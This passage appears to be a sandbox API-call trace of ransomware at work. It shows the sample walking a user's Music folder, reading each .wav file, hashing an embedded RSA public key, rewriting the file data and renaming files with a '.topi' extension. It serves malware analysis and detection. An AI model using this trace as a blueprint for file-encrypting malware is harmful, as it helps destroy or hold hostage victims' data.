HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d90 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d78 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d48 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d30 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a033b0 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.263] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.263] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.263] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.263] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xffea, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xffea, lpOverlapped=0x0) returned 1 [0097.263] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.263] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xffef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.263] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.263] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.263] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.263] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.263] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.263] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.264] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.264] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.264] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.264] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.264] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.264] CloseHandle (hObject=0x6a8) returned 1 [0097.265] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.265] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0097.265] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.265] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\AHntfyKO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\fyewgj\\ahntfyko.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\AHntfyKO.wav.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\fyewgj\\ahntfyko.wav.topi")) returned 1 [0097.266] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.266] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.266] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0097.267] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe516b4d0, ftCreationTime.dwHighDateTime=0x1d5bebb, ftLastAccessTime.dwLowDateTime=0x182a2c10, ftLastAccessTime.dwHighDateTime=0x1d5c102, ftLastWriteTime.dwLowDateTime=0x182a2c10, ftLastWriteTime.dwHighDateTime=0x1d5c102, nFileSizeHigh=0x0, nFileSizeLow=0x16627, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kYrXk17A-2pFpx.wav", cAlternateFileName="KYRXK1~1.WAV")) returned 1 [0097.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e39e8 [0097.267] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0097.267] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e39e8 | out: hHeap=0x680000) returned 1 [0097.268] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\kYrXk17A-2pFpx.wav") returned=".wav" [0097.268] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\kYrXk17A-2pFpx.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\fyewgj\\kyrxk17a-2pfpx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.268] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=91687) returned 1 [0097.268] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.271] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x16601, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.271] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.272] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.272] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.272] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.272] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x16627, lpOverlapped=0x0) returned 1 [0097.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.273] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.273] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.273] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.274] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.274] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.274] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.274] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.274] GetLastError () returned 0x0 [0097.274] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.274] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.274] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.275] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.275] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.275] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.275] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16630) returned 0x9a06a00 [0097.275] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.275] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a033b0 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d30 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb2f0 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d48 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d78 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d90 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.276] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.276] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d78 | out: hHeap=0x680000) returned 1 [0097.276] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d90 | out: hHeap=0x680000) returned 1 [0097.276] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.276] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.276] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4d90 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4d78 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.276] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d90 | out: hHeap=0x680000) returned 1 [0097.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d78 | out: hHeap=0x680000) returned 1 [0097.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.277] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.277] GetCurrentThreadId () returned 0x8c4 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9530 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.277] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.278] GetCurrentThreadId () returned 0x8c4 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.278] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d78 [0097.278] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d90 [0097.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d60 [0097.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4da8 [0097.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0097.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.279] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d78 | out: hHeap=0x680000) returned 1 [0097.279] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d78 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.280] RtlAllocateHeap (HeapHandle=0x680000, 